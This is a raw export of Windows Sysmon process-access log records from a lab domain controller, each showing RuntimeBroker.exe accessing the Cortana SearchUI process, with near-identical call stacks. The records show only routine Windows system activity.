12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006998Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006997Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006996Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006995Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006994Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006993Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006992Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006991Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006990Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006989Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006988Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006987Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006986Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006985Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006984Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006983Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006982Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006981Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006980Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
